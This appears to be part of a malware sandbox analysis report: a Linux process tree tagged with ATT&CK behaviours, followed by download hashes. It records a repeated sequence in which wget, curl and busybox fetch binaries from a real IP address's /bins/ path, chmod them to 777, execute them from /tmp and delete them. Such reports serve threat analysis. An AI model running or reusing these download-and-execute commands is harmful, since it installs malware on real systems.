- File and Directory Permissions Modification
PID:938
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:943
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:949
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:955
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:961
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:967
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:973
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:979
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:982
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:983
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:985
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:988
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:989
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:991
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:994
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97